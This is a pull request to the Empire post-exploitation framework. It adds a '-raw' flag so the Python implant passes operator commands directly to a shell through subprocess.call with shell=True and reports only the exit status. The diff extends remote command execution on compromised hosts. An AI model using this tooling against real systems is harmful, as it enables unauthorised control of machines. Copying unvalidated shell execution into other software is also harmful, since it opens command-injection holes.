### PR TITLE
Raw shell commands

### DIFF
--- a/data/agent/agent.py
+++ b/data/agent/agent.py
@@ -852,7 +852,14 @@ def data_webserver(data, ip, port, serveCount):
 
 # additional implementation methods
 def run_command(command):
-    if "|" in command:
+    if "-raw" in command:
+        command = command.replace("-raw","")
+        result = subprocess.call(command, shell=True)
+        if not result:
+            return "%s returned an exit code of zero" % command
+        else:
+            return "%s returned a non-zero exit status" % command        
+    elif "|" in command:
         command_parts = command.split('|')
     elif ">" in command or ">>" in command or "<" in command or "<<" in command:
         p = subprocess.Popen(command,stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)

--- a/lib/common/empire.py
+++ b/lib/common/empire.py
@@ -2674,7 +2674,7 @@ class PythonAgentMenu(SubMenu):
 
 
     def do_shell(self, line):
-        "Task an agent to use a shell command."
+        "Task an agent to use a shell command. Use flag -raw to run a raw shell command (no result returned)"
 
         line = line.strip()
 


### PR DESCRIPTION
Adds support for scenarios where a raw shell command needs to be run and the result may need to be piped to a file.  This is to solve [https://github.com/EmpireProject/Empire/issues/991](https://github.com/EmpireProject/Empire/issues/991)

@xorrior I just saw you self assigned this, so feel free to reject if you have a more elegant solution.

Command is executed and the status code of the execution (0 or 1) is returned to the server.

Test commands:
shell -raw echo xxx | cat > /tmp/file